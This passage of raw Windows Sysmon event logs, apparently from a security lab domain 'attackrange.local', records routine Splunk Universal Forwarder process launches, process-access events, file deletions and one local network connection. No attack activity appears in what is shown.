Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE89B6AD1A74239B12DAAB9110FA1771,SHA256=A28E13B750A50857EA07A2A182A4743650AB57F424CB177F2148225975218049,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.508{466BC892-F946-60EB-197E-00000000CF01}94965780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.286{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.271{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:50.256{466BC892-F946-60EB-197E-00000000CF01}9496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.976{466BC892-F947-60EB-1B7E-00000000CF01}28607772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.624{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B962A8DE9BC080E90B9D2EBF70EF57E2,SHA256=54C0032EDB996274A0FD9AC76012E4753D4241E48CDF00CEB30DE4A71FCFD742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:51.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCE2F80269EA8B32F31836AC00A5C96,SHA256=53341BC0862F6B5E11D058CEF025A05601C24C5608A79CEEE27A06D181279B2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4C94048CB5CDF99294CF7C795894158,SHA256=611282C1D0470B0F3D8681BE5CB1E757C1DCA0219F5A3AF685EB14A768F7EBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CF21187B9F3DB473F0253037E3A40ED,SHA256=7FD05ACDF17CB2684A0772F3898058B1E01BBC9C918F60F4F2271F9F2B020819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4C94048CB5CDF99294CF7C795894158,SHA256=611282C1D0470B0F3D8681BE5CB1E757C1DCA0219F5A3AF685EB14A768F7EBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.621{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA1B9F09AA085537FE6397FB61F5F6C8,SHA256=079ABC9934F552EF72A06A99E9F27DF94F812D95E1CCCDB275FE8F573FFAB76A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:52.579{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B314881D99331F2DDC8DE8BDD9696DF,SHA256=2D31FDE37CDF2046FAD5863CD1F4E26E3A28FCDF1A17769C29D0E796F8F1808F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.583{466BC892-F948-60EB-1C7E-00000000CF01}71166724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:44.744{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62026-false10.0.1.12-8000- 10341000x80000000000000001055882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 